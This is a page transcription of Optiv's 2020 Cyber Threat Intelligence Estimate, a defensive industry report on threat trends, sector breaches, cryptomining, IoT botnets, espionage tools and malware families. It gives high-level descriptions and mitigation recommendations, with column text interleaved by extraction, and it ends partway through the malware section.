2020 CYBER THREAT INTELLIGENCE ESTIMATE - A view of the cyber-threat landscape to help organizations mitigate risk and strengthen their defenses ...
←
→
Page content transcription
If your browser does not render page correctly, please read the page content below
SUBTITLE 2020 CYBER THREAT INTELLIGENCE ESTIMATE A view of the cyber-threat landscape to help organizations mitigate risk and strengthen their defenses.
Table of Contents
1 7
Introduction........................................................ 1 Hybrid Threat Actors..................................... 22
Nation-States................................................... 23
2 Actors with Criminal Intent................................. 27
Executive Summary......................................... 2 Hacktivists..................................................... 29
Commercial Entities..................................... 29
3
COVID-19 Update............................................ 3 8
Impacts............................................................... 3 Data Breaches............................................. 30
Strategies........................................................... 4 Worldwide Privacy Regulations...................... 31
Regulatory Momentum............................... 31
4 Recommendations....................................... 32
Data Gathering and Analysis........................ 5 Identity and Data Management..................... 32
Threat Trends..................................................... 5 Authentication Uptick.................................. 32
Phishing and Brand Misuse, Infrastructure Managing Elevated Credentials................. 33
and Data Leakage Incidents............................. 6 Recommendations....................................... 33
Data Leakage Alerts.......................................... 6
Vertical Industry Data........................................ 7 9
Zero Trust.......................................................... 35
5 A Practical Path to Zero Trust.......................... 36
Vertical Industry Breach Highlights............ 9 Recommendations........................................... 36
Healthcare........................................................ 10
Financial............................................................ 10 10
Retail/Hospitality.............................................. 11 Notable Breaches........................................... 37
Manufacturing.................................................. 11
Energy/Utilities................................................. 11 11
Recommendations........................................... 11 Dark Web.......................................................... 38
Dark Web Marketplaces.................................. 39
6 Dark Web by the Numbers............................. 39
Attack Tools, Techniques and Recommendations........................................... 39
Procedures........................................................ 12
Cryptomining................................................... 13 12
Recommendations....................................... 13 Conclusions....................................................... 40
Internet of Things............................................ 14
Top IoT Attacker Methods.......................... 15 13
Recommendations....................................... 15 Contributors..................................................... 41
Cyber Espionage............................................. 17
Tools.............................................................. 17 14
Recommendations....................................... 18 References........................................................ 42
Malware: Kryptik, Obfuse and Emotet........... 18
Recommendations....................................... 19
Malware: Ransomware..................................... 20
Recommendations....................................... 21
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 3 3
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Introduction
The threat landscape is more intense
and more complex than ever before.
COVID-19 and the resulting shift for many of us to work-from-home has
increased opportunities for threat actors and also increased the burden
on cybersecurity providers. Many businesses now rely more heavily on
third-party vendors, as well, and this amplifies the risks that already
existed for companies contending with identity and data management
challenges, privacy regulations and the Internet of Things.
It is vital for business leaders to understand these developments and the
consequent need to protect a larger, more fluid attack surface that is more
vulnerable to both internal and external threats than previously was the case.
Beyond that, threat actors also constantly develop and acquire new tools,
techniques and procedures, and refine existing ones, in their efforts to
identify and exploit vulnerabilities. The best way to protect effectively against
malicious activity is to take a comprehensive, integrated and managed
approach to cybersecurity, a key component of which is up-to-date threat
intelligence. In fact, the most efficient and effective threat countermeasures
are based on a detailed understanding of the ever-evolving threat landscape.
This Cyber Threat Intelligence Estimate summarizes key threat
activities, threat actors and topics crucial to data breach prevention.
It also provides recommendations that business leaders and security
practitioners should consider as they make decisions about cybersecurity
programs and investments, as well as risk management.
General David Petraeus,
US Army (Retired),
Partner, KKR and Chairman,
KKR Global Institute,
Optiv Board Member
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 1
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Executive Summary
The 2020 Cyber Threat Intelligence Estimate (CTIE) is inspired by national
intelligence estimates, which are analytic reports produced by the
intelligence community of the United States for consumption by Congress.
Evolving technology, threat actors and regulations require security leaders
and security practitioners to be familiar with their own environment
and assets and stay abreast of the latest global threat trends. This
report comprises contributions from Optiv’s Global Threat Intelligence
Center (gTIC); VMware Carbon Black; Digital Shadows; Palo Alto
Networks global threat intelligence team, Unit 42; and SailPoint.
This CTIE summarizes the following information:
Vertical Attack Tools,
Industry Breach Techniques and Hybrid
Highlights Procedures Threat Actors
9 12 22
Data Dark Web
Breaches Practices
30 38
Additionally, a special section on COVID-19 offers insights
into security concerns as well as actions that business
leaders can take to bolster cybersecurity.
By applying the best-practice recommendations provided in
the CTIE, decision-makers and influencers can strengthen their
cybersecurity strategies and operations. For organizations that
collect and analyze their own threat intelligence, the intelligence
assembled in the CTIE can validate and augment their findings.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 2
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
COVID-19 Updates
The COVID-19 pandemic has had and will » Compliance and regulatory risk result
likely continue to have profound, long- from third-party security breaches.
lasting effects on companies and people.
The following insights and guidance may be During these uncertain times, an enterprise’s
useful to business leaders whose employees security roadmap and objectives remain
are working from home. Remote access the best framework within which to make
support via phone, chats and video create decisions. Existing cybersecurity principles
new and different vulnerabilities. This apply now more than ever, especially for
massive expansion of the attack surface is industries at high risk for cyber attacks.
a necessity for business continuity, but it
comes with security and risk concerns.
IMPAC TS
Workers often are unaware of threats, further Organizations and industries most crucial
increasing risk. to the COVID-19 response, or those already
affected by the economic fallout caused
by the pandemic, are likely most at risk
of being targeted by cyber-threat actors.
Since January 2020, more than
Digital Shadows analysts point to warnings
4,000 coronavirus-themed web from governmental and intergovernmental
domains have popped up, and agencies, directed particularly to healthcare
around 5% were suspicious and businesses and manufacturers of critical
3% malicious.1 medical equipment and personal protective
equipment, stating that a disruptive cyber
Digital Shadows blogs describe phishing and attack will amplify their struggles.
social engineering scams, sale of fraudulent
or counterfeit goods and COVID-19 cures, The VMware Carbon Black team analyzed
and general misinformation. financial services firms and discovered that
the cybercriminal community took advantage
Many businesses have turned to third-party of COVID-19 in tandem with the news
vendors – for collaboration solutions, for cycle, escalating their coordinated criminal
example – to support productivity. Digital conspiracies. Everyone should pay close
Shadows analysts identified potential third- attention to these threat actors and thwart
party risks: their goal: hijacking digital transformation
efforts via island hopping.
» Operational risk involves potential
losses resulting from inadequate or failed
procedures, systems or policies.
» Transactional risk involves potential
losses due to problems with a service
and/or its delivery.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 3
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
S T RAT E G I E S Fortunately, providing expanded
access services for employees and
Optiv cybersecurity experts find that customers dovetails with common
employers are pursuing three basic organizational priorities:
strategies to combat COVID-19:
» Expand existing access » Moving workloads to the cloud
» Create alternate access methods » Migrating to software as-a-service (SaaS)
applications
» Redesign infrastructure
» Retooling identity governance
» Enabling mobility/bring your own device
(BYOD)
» Applying Zero Trust access methods
O T HE R A C T I O N S Y O U C AN TAKE TO
M IN IM I Z E T H E I MPA C T OF C OVID -19
» Provide security awareness training. » Include SecOps management in business-
Make it easy for workers to find line decision planning related to remote
documentation about remote access and workforce enablement. Your SecOps/
how to be safe online. Publish a list of cybersecurity teams need to stay on top of
approved collaboration tools for chat and changes in traffic flows, peak operating times
online meetings. Supply guidance on which and new sources of telemetry to incorporate
applications can be accessed remotely. into monitoring tools. A tiger team can best
implement the acquisition and monitoring
» Deploy and update endpoint security of new telemetry for net-new applications
agents. Validate and publish the steps and access methods. Be prepared to coach
to enroll your remote endpoint security employees on how working from home
agent. Implement host validation checks to will change usual business practices
ensure a minimum standard is met before and behavioral monitoring systems.
allowing access to sensitive information.
And, determine the level of access that » Vet suppliers thoroughly. Make sure
will be permitted for personal devices. security practices match your requirements
and monitor third-party applications so
» Manage user identities properly, including incidents can be tracked and resolved.
accurate, accessible directory services.
Leverage a single-sign-on (SSO) dashboard for As you decide how your business will
application distribution and use multifactor operate during this fluid situation,
authentication wherever possible. Enhance keep cybersecurity top of mind as you
and expand monitoring and reporting respond to the increased threat level.
on access to sensitive information. COVID-19 checklists are available from
Optiv upon request.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 4
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Data Gathering and Analysis
Security analysts gather, weigh and THREAT TRENDS
synthesize data sources to prepare the
intelligence analysis that appears in the A comparison of 2018 and 2019 threat
CTIE. Some of the data is circumstantial, activity observed by Optiv reveals patterns
and it is up to the analysts to find multiple, that indicate shifting trends. In this
corroborating intelligence data points to comparison, a threat is any event that may
assemble a clear picture that describes cause a security incident.
the threat landscape. Experts from the
contributing companies collect cyber-activity 16% fewer threats in 2019 than
statistics from thousands of clients, and the
2018 in total on average
data is summarized here so you can easily
understand key activities, events and trends.
2018
80,000
20 18
60,000
EVENTS
40,000
20,000
0
J F M A M J J A S O N D
MONTH
Figure 1 - Observed threat activity in 2018 (Optiv)
2019
20 19
80,000
60,000
EVENTS
40,000
20,000
0
J F M A M J J A S O N D
MONTH
Figure 2 - Observed threat activity in 2019 (Optiv)
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 5
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
At the end of 2018, overall threat activity gradually increased before dropping
off for a few months. This trend continued throughout 2019 in two large cycles,
each made up of two smaller cycles. On a standard fiscal year quarterly basis,
aspects of the threat landscape reset and then gradually started to climb.
Cumulative highs at the beginning and end of the year point to the idea that
threats will continue to occur around specific events and timing-oriented attack
patterns to maximize damage. In total, the average threats per day in 2019
appear to be about 16% lower than the threats in 2018.
PHISHING AND BRAND
MISUSE, INFRASTRUCTURE 9%
24% Data leakage
AND DATA LEAKAGE Infrastructure
INCIDENTS
As organizations and their brands continue
to grow, their attack surfaces also grow.
Attackers are increasingly targeting and
impersonating organizations across all
channels. Digital Shadows classifies this
activity into three main incident categories:
phishing and brand misuse, infrastructure 67%
Phishing and
and data leakage. Phishing and brand misuse brand misuse
include malicious and impersonating web
domains, as well as spoof social media Figure 3 - Breakdown of 2019 incidents
profiles. Infrastructure includes domain (Digital Shadows).
certificate issues and port exposures. Data
leakage covers the exposure of sensitive
documents, customer details and code on
unwanted or unintended sources.
10% 3%
DATA LEAKAGE ALERTS Technical Internally
Leakage Marked Document
Data leakage alerts include unmarked
documents, customer details, protectively 3%
marked documents, technical leakage and Unmarked
internally marked documents. Document
39% 45%
Protectively Customer Details
Marked Document
Figure 4 - Breakdown of 2019 data leakage alerts
(Digital Shadows).
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 6
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
VERTICAL INDUSTRY DATA
For all incidents reported by Digital Shadows, the majority, 66%, belong to
organizations in the technology and financial services sectors. These include
alerts for impersonating domains, spoof social media profiles, data breaches
and credential exposure, and exposed documents.
66% of incidents belong
to organizations in the
Figure 5 - 2019 Alerts by Vertical (Digital Shadows). technology and financial
services sectors
LEGEND
FINANCIAL
TECHNOLOGY OTHER HEALTHCARE RETAIL OIL AND GAS
SERVICES
TRAVEL AND FOOD AND AUTOMOBILES
UTILITIES EDUCATION INSURANCE
LEISURE BEVERAGE AND PARTS
PERSONAL AND EQUITY/NON- LEGAL BASIC
GOVERNMENT
HOUSEHOLD EQUITY SERVICES RESOURCES
GOALS INVESTMENT
INSTRUMENTS
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 7
1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
41%
40 C RE D ENTIAL TH E FT BY VERTIC AL
PERCENTAGE OF INCIDENTS
30
26%
20
10 8%
6% 5% 4% 3% 2% 2% 2%
0
INDUSTRY VERTICAL
Figure 6 - 2019 credentials by vertical (Digital Shadows).
45
40 P H ISH ING INC ID ENTS BY VERTIC AL
35%
35
PERCENTAGE OF INCIDENTS
30
25
20
15
10% 10% 10%
10
6% 5% 4% 3% 3%
5 2% 2% 2% 2% 2% 2%
INDUSTRY VERTICAL
Figure 6 - 2019 phishing by vertical (Digital Shadows).
LEGEND
FINANCIAL
TECHNOLOGY OTHER HEALTHCARE RETAIL OIL AND GAS
SERVICES
TRAVEL AND FOOD AND AUTOMOBILES
UTILITIES EDUCATION INSURANCE
LEISURE BEVERAGE AND PARTS
EQUITY/NON-
GOVERNMENT MEDIA EQUITY
INVESTMENT
INSTRUMENTS
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 81 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Vertical Industry
Breach Highlights
Industries at high risk from certain TLS is a protocol that provides
vulnerabilities and threats are discussed authentication, privacy and data integrity
below. Optiv’s threat actor risk metric between communicating applications.
system2 can help you assess risk and There are several vulnerabilities in older
develop appropriate countermeasures. versions of TLS. Several certificate
authorities have largely deprecated
Companies across industries increased their versions 1.0 and 1.1, making it advisable for
risky use of Secure Shell (SSH), Remote organizations to support only v1.2 and 1.3.
Desktop Protocol (RDP) and Transport
Layer Security (TLS). According to Palo For cloud operations, a Zero Trust approach
Alto Networks analysts, attackers target is the best practice, regardless of industry
SSH when it is configured to use password type. Cloud service providers are not
authentication, creating a low barrier to responsible for managing an organization’s
entry. To thwart these attacks, use public cyber risk. Organizations using the cloud
key authentication (RSA, ECDSA or Ed25519 must protect their applications and data,
key pairs) for all SSH-enabled systems. but unauthorized access and inconsistent
security policies make this challenging. Also,
RDP operates over port 3389 to enable organizations typically use more than one
remote administration of Windows cloud platform. Zero Trust frameworks
environments. RDP is frequently used are built on the notion of “never trust,
as an initial vector for ransomware. always verify,” meaning that no access is
Instead of exposing RDP to the public permitted without identification. However,
internet, use alternatives such as Virtual identification alone is not sufficient.
Desktop Infrastructure (VDI) or virtual After access is established, traffic flow
private networks (VPNs) that provide should be inspected continuously.
connectivity without exposing public IPs.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 91 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
HEALTHCARE FINANCIAL
Palo Alto Networks analysts conclude that In recent months, as COVID-19
risk for healthcare companies is elevated disordered many businesses, VMware
because Internet of Things (IoT) device Carbon Black analysts observed a 148%
security has declined, leaving organizations increase in ransomware attacks and a
vulnerable to new IoT-targeted malware 238% increase in attacks against the
as well as older attack techniques. Analyst financial sector. The research shows:
research reveals these key IoT concerns:
of surveyed banks said they
» Outdated software. 83% of medical saw an increase in cyber
imaging devices run on unsupported 80% attacks over the past 12
operating systems – a 56% jump from 2018 months, marking a 13%
as a result of the Windows® 7 operating increase over 2019.
system reaching its end of life. Just over
half (51%) of threats involved imaging
devices, disrupting the quality of care and of surveyed financial
allowing attackers to exfiltrate patient institutions reported increased
data stored on these devices. This general 64% attempts of attempted
decline in security posture opens the door wire fraud transfer, a 17%
to new attacks, such as cryptojacking, increase over 2019.
and brings back threats like Conficker.
of surveyed financial
» Poor network hygiene. 72% of institutions said cybercriminals
healthcare VLANs mix IoT and IT assets,
82% have become more
allowing malware to spread from users’ sophisticated, leveraging highly
computers to vulnerable IoT devices targeted social engineering
on the same network. 41% of attacks
attacks, advanced TTPs for hiding malicious
exploit device vulnerabilities, as IT-borne
activity, and exploiting weaknesses in people,
attacks scan through network-connected
processes and technology to gain a foothold
devices to exploit known weaknesses.
and persist in the network enabling the ability
Attacks are shifting from IoT botnets
to transfer funds and exfiltrate sensitive data.
conducting denial-of-service attacks to
more sophisticated attacks targeting
patient identities, corporate data and
monetary profit via ransomware. Analysts observed a
» Inadequate security function. Biomedical
148% increase in ransomware
engineers who maintain medical devices attacks and a 238% increase
often lack the training and resources in attacks overall
to follow IT security best practices:
password rules, secure password storage
and maintaining up-to-date patches.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 101 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
RETAIL/HOSPITALITY MANUFACTURING
Retail was heavily targeted during the past According to a recent study, 40% of
year by cyber-based attacks. The most manufacturers were affected by a cyber
common observed malware families included incident.4 Verizon provides additional insights:
Emotet, Obfuse and Kryptik. E-commerce
sites are favorite targets for cybercriminals
that commonly leverage skimming scripts of manufacturing
such as Magecart to scrape and exfiltrate 1/3 attacks were made
payment card information. Criminal threat up of internal actors
actors commonly attempt to spoof a
legitimate vendor or exploit a vulnerability
on the e-commerce vendors' payment page
to inject a crafted JavaScript skimmer.
of organizations report
VMware Carbon Black research reveals: 49% having credentials
compromised
of retailers lost
40% revenue in 2019 due
to cyber attacks of documented
cases were financially
68% motivated and 27% were
saw increasingly sophisticated espionage related5
cyber attacks as the year
73% progressed, and 33% of these
organizations experienced ENERGY/UTILITIES
an island-hopping attack
Energy and utilities companies were
affected by some of the most high-profile
cyber attacks between 2015 and 2018. In
of the surveyed March 2019, a Utah-based utility company
66% organizations experienced became the first American energy company
a ransomware attack3 to see grid operations get disrupted
by a cyber attack.6 Dragos and E-ISAC
observed an increase in scans of U.S. and
East Asia-based industrial control systems
(ICS) by the XENOTIME threat actor.
RE C O MME N D AT I O NS
Implement network segmentation to Develop system access policies following
limit the attack surface available to an the least-privilege principle
insider threat
Implement patch management to
Apply multi-factor authentication ensure systems are updated to the
latest version
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 111 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Attack Tools,
Techniques and
Procedures
Tools, techniques and procedures (TTPs)
are common topics in threat intelligence
circles because they are some of the simpler
aspects to study. Threat actors use TTPs –
which describe the “how” and “what” – to
carry out their attacks. The correlation and
analysis of TTPs help analysts figure out the
“who” and “why.” Important TTPs involve
cryptomining, IoT attack methods, cyber
espionage and malware.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 121 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
CRYPTOMINING » 8220 Mining Group. The tell-tale
signs of 8220 operations within network
Palo Alto Networks analysts found that nearly environments involve the use of port
9% of cloud organizations showed signs 8220. While port 8220 is an uncommon
of connecting to, and likely performing, port for default networked environments,
mining operations via public Monero it is possible for port 8220 to be used for
(XMR) mining pools. Public mining pools custom purposes. Researchers paired
are systems or networks that coordinate, network connections like PE-Miner
manage and distribute mining operations. and XMRig from organizations with
Remote systems connect to these pools connections over port 3333, which is a
to receive mining instructions and, upon commonly used port by 8220 and known
completion of the operations, receive a to be used by cryptomining software.
share of the resulting financial proceeds. Based on known 8220 indicators of
compromise (IOCs), Palo Alto Networks
Nearly 60% of all public XMR mining analysts found that 21% of cloud
network connections to XMR pools are organizations had network connections
located within the United States. Mining that appeared to have 8220 signatures
operations can evade geographic blacklisting
or whitelisting based solely on country The pattern of cloud system connections
or region criteria. They take place often over ports 3333 and 8220 to external
over ports such as 80 and 443, which are systems is suspicious because a
meant to avoid corporate firewall rules. single destination system was being
connected to using two separate ports.
Frequently used tools include: And, it is suspicious for destination
IP addresses used in the connections
» Rocke. This tool has evolved cyber not to be routed through DNS
operations beyond cryptomining with name resolutions and instead called
another tool called Godlua, which directly through their IP addresses.
performs proxy Lua (a programming » Pacha. Pacha competes with Rocke for
language designed primarily for cryptocurrency mining in the cloud, but
embedded use in applications) scripting activities in 2019 declined significantly.
operations and various shell operations 93% of Pacha cryptocurrency traffic
within cloud infrastructure. Network was destined for China, although the
connections to known Rocke infrastructure specific types of network operations
trended downward, in part because cloud being performed are unknown.
environments are less reliant on native
cloud service provider network controls.
RE C O MME N D AT I O NS
Use Layer 7 packet inspection Apply virtual next-generation
signatures via virtual next-generation firewalls (NGFWs) to block connections
firewalls to known Rocke infrastructure
Integrate virtual network traffic Block 8220 communications by
inspection tools preventing communications with
known malicious IP addresses
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 131 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
INTERNET OF THINGS
Use Cases
IoT adoption grew to an estimated 4.8 billion
devices, up 22.5% from the end of 2018.7 Palo
Alto Networks analysts found that 98% of
IoT traffic is unencrypted, exposing personal
and confidential data on the network and
that 57% of IoT devices are vulnerable to
medium- or high-severity attacks. IoT offers
low-hanging fruit due to the vulnerabilities Ryuk Ransomware
created by low patch levels and aging The Ryuk ransomware took down a
operational technology (OT) protocols. United States Coast Guard facility for
more than 30 hours in late 2019. The point
According to Optiv IoT experts, IoT of entry was a malicious email sent to an
cybersecurity received more attention during employee. After the employee clicked on a
the past year, in part because ownership link, a threat actor accessed and encrypted
shifted to chief information security officers critical IT network files, blocking staff
(CISOs). In the past, IoT security belonged access to the information. The virus spread
to several groups, resulting in isolated throughout the facility, also impacting
initiatives. With greater responsibility and industrial control systems that monitor
budget control in the hands of CISOs, and control cargo transfer and encrypted
they can be stronger IoT champions. files critical to process operations.8 Ryuk
attackers, which reportedly target firms
An immediate enterprise priority is a with annual revenue between $500 million
unified incident response (IR) platform that and $1 billion, also targeted oil and gas
incorporates both IT and OT. The lack of a companies, including Mexico’s Pemex.9
unified IR platform continues to hamstring
business continuity and business recovery
efforts. Some companies lump IT and OT
into the IoT bucket, but OT goes beyond the
usual security concerns to include product/
manufacturing protection requirements.
Attackers tunnel through from IT to OT
using paths of least resistance. Once inside,
they can linger and eventually access entire
environments depending on security maturity. Urgent/11
Urgent/11 is a suite of network protocol
Some decision makers are pursuing bugs that creates vulnerabilities in TCP/
Zero Trust fundamentals to improve IoT IP stacks by allowing devices to connect
cybersecurity. Device visibility received a to networks like the internet. The code
boost from new tools capable of pulling out has been around for many years, and
vulnerability data. Segmentation gained the bugs exist in far more platforms
momentum, but it was limited due to cost, than originally believed. Always-on
complexity and resource constraints. An devices common in industrial control
alternative is cloaking – a duplicate, disguised settings and the healthcare industry
network that allows authorized traffic. are particularly vulnerable to attacks or
takeovers. At least seven affected operating
systems run in countless IoT devices.10
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 141 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Top IoT Attacker Methods » Unclosed backdoors. WannaCry
ransomware attacks spread through
The Palo Alto Networks analysts scrutinized
backdoors left open by previous
cross-industry research and identified these key
DoublePulsar malware infections. The use
methods used by attackers to compromise IoT:
of unpatchable devices, such as those
running Windows 7, allow these two-stage
» Exploits target device vulnerabilities.
attacks to continue happening.
IoT devices are used as stepping stones in
lateral movement to attack other systems » Unsegmented networks. WannaCry cases
on a network. Attacker activities include in healthcare spreads in mixed networks
network scans, IP scans, port scans and with devices such as PCs, scanners
vulnerability scans on networks that and nuclear imaging devices. With
attempt to identify potential next-step strong self-propagation and infection
targets. capability, WannaCry cross-infects devices
throughout IoT and IT.
» Password attacks. These attacks are
fueled by default, manufacturer-set » Botnet attacks. The Mirai malware turns
passwords, poor password security networked devices running Linux into
practices and operational misalignment. remotely controlled bots that can be used
For example, passwords chosen by as part of a botnet in large-scale attacks.
OT staff are not in line with the more Primary targets are online consumer
advanced password policies and password devices such as IP cameras and home
management practices used by IT. routers. Mirai has grown into a framework
California’s SB-327 IoT law now prohibits to which developers can add new device
the use of default credentials, which will exploits as new variants.
help reduce password attacks.
RE C O M ME N D AT I O NS
Develop an IoT security strategy Implement active around-
that encompasses the entire IoT the-clock monitoring.
lifecycle and all IoT devices
Discover IoT devices on Use a vulnerability management
your network process that encompasses:
Patch printers and other » Asset discovery
easily patchable devices » Identification of vulnerabilities
in the assets
Segment IoT devices across VLANs » Threat intelligence to
– micro-segmentation is preferred prioritize vulnerabilities
» Patching, configuration management
and isolation as remediation methods
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 151 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
2 0 1 9 N O TA B L E
Io T AT TA C K S
SEPTEMBER 2019
Palo Alto Networks analysts
discovered an updated Gafgyt
variant attempting to infect IoT
devices, specifically small office/
home wireless routers of certain
commercial brands.
DECEMBER 2019
Palo Alto Networks analysts discovered a
new variant of the Muhstik botnet that
adds a scanner to attack Tomato routers by
web authentication brute forcing. Muhstik,
which has a wormlike self-propagating
capability to infect Linux servers and IoT
devices, mainly launches cryptocurrency
mining and DDoS attacks with IoT bots to
earn profit.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 161 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
CYBER ESPIONAGE » PsExec. This tool is part of Microsoft’s
Sysinternals. It enables system
Optiv’s gTIC followed cyber espionage, administrators to remotely access and
which is cyber activity directed at private and manage their systems over the Server
public sector entities with the aim of stealing Message Block (SMB) protocol, TCP
sensitive or classified data or intellectual port 445. The open-source penetration
property to gain a competitive advantage over tool Metasploit specifically contains
a rival organization or country. Threat actors a PsExec exploit module that allows
engaged in cyber espionage are sophisticated an attacker to conduct remote code
and often fall under the classification of execution on a targeted machine.
advanced persistent threats (APTs). Depending
on their target, they can exploit a range of » Mimikatz. An offensive security tool,
vectors to establish a foothold within a target Mimikatz can be used at the post-
system. These attacks are often preceded exploitation phase of an attack. Its
by reconnaissance activity. The ramifications functionality encompasses password
of espionage include loss of competitive dumping from memory, PINs, hashes
advantage, sabotage and political instability. and Kerberos tickets. This tool works by
exploiting Windows single-sign-on (SSO)
Tools procedures. Successful exploitation can
enable other attacks including pass-
Threat actors often leverage both in-house and
the-hash and Golden Ticket attacks.
publicly available hacker tools common among
many threat groups. This not only frees up time » X-Agent. This modular backdoor is
and resources but also makes post-exploitation leveraged by APT28, a Russian state-
analysis and attribution more difficult – adding linked espionage group with ties to
to the attackers’ level of obfuscation. GRU, Russia’s military intelligence
organization. Also called CHOPSTICK,
Espionage attacks do not differ much from X-Agent functionality focuses on
financially motivated attacks, but they can span information gathering and includes
a longer timeframe. State-hosted espionage capabilities such as logging keystrokes,
operations are commonly supported by a transmitting remote files, taking
much larger and sophisticated infrastructure screenshots and modifying registries.
than those used by criminal actors. Some
commonly leveraged public tools include:
Turla Hijacks APT34 Tools
In October 2019, the United Kingdom’s National Cyber Security
Centre (NCSC) and the United States’ National Security
Agency (NSA) issued a joint advisory. It stated that the Russian
state-associated threat actor Turla used tools linked to the
Iranian threat actor APT34. This included the Neuron and
Nautilus tools designed to target mail servers and web servers
on Windows. Turla used Neuron and Nautilus to target a range
of victims, including a cluster of Middle Eastern organizations.
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 171 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
» Empire. An open-source post-exploitation MALWARE: KRYPTIK,
framework, Empire can operate cross-
platform. It is used by advanced
OBFUSE AND EMOTET
persistent threat actors including APT33, VMware Carbon Black analysts provided
APT19, FIN10 and Turla. Empire can run insights into Kryptik, Obfuse and Emotet.
PowerShell agents without powershell.exe This malware is often used in long, complex
along with a range of post-exploitation campaigns for which the end goal is to
modules geared to logging keystrokes, leverage native operating system tools to
network detection evasion and containing remain invisible or gain a foothold in one
Mimikatz. Additionally, Empire’s network system (sometimes a supply chain partner) to
traffic was asynchronous and blended in island hop to a larger, more lucrative target.
with normal network traffic. Development
of Empire ceased in mid-2019. The Kryptik trojan attempts to target victim
machines via nefarious installers. It then
» netstat. This operating system utility is attempts to acquire admin rights to make
used to display TCP connections, network registry modifications, allowing it to execute
connections and listening ports common each time a Windows machine boots. Kryptik
within Windows, Linux and UNIX. can be persistent and, without appropriate
visibility, can be difficult to detect as it attempts
» Cobalt Strike. A commercially
to delete its executable file after running.
available penetration testing tool,
Cobalt Strike has been adopted by
As noted by a threat profile from the New
several espionage threat actors. These
Jersey Cybersecurity and Communications
include APT29, APT17 and CopyKittens.
Integration Cell (NJCCIC): “[The Kryptik trojan]
Its full range of post-exploitation
queries the Windows registry for the .ini or
functions present cyber-espionage
.dat file paths. It also queries registry subkeys
actors with a convenient framework.
for the actual host, username and password
related to the specific FTP client application.
Kryptik searches the registry, querying for both
ftpIniName and InstallDir that hold the wcx_ftp.
RE C O M ME N D AT I O NS ini file. The trojan can recover many common
FTP clients, email clients, file browsers and file
Enforce a security policy that manager programs. Kryptik also can update
covers cyber-based, insider itself and remotely download new versions.”11
and physical-based threats to
stop cyber-espionage threat Obfuse is a trojan virus designed to steal
actors that go to great lengths confidential data stored on a system. It
to access their targets is delivered through porn websites, free
online games, peer-to-peer file sharing,
Ensure operating systems, misleading ads, free third-party software and
software and firmware are spam email attachments. Difficult to detect
patched to the latest updates and remove, Obfuse can disable antivirus
with patch management that software, redirect browsers, slow system
maintains automatic updates speed, freeze programs and pay repeat visits
after creating new malicious registry keys.
Implement multi-factor
authentication
OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE 181 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14
Emotet, a family of banking malware, has
been around since at least 2014. Attackers
A three-part Palo Alto
continue to leverage variants of Emotet
and are becoming increasingly shrewd Networks blog series focuses
in the techniques they employ to deliver on static analysis of PowerShell
the malware onto an infected system. scripts and a platform-
Researchers using managed hunting services independent Python script
observed a spike in the adaptation to to carry out the task. The
existing methods leveraging PowerShell.
author studied approximately
Attackers encrypted the URLs of the
command and control (C2) systems used
5,000 PowerShell scripts
to host the second-stage payload. and describes behavioral
profiling, common
Further, several attacks originated from obfuscation, methods of
phishing campaigns that leverage Microsoft hiding data within PowerShell
Office Word documents with obfuscated scripts and a scoring system to
VBScripts using PowerShell and the
assess risk.
ConvertTo-SecureString cmdlet, which in
the later stages is used to decrypt the C2(s)
and associated logic. This represents an
evolution of current macro attack techniques
– these types of cmdlets are not typically
associated with phishing campaigns.
RE C O M ME N D AT I O NS
Install next-generation antivirus Implement techniques within
coupled with endpoint detection and Microsoft environment such as
response (EDR) and micro-segmentation Microsoft Just Enough Administration
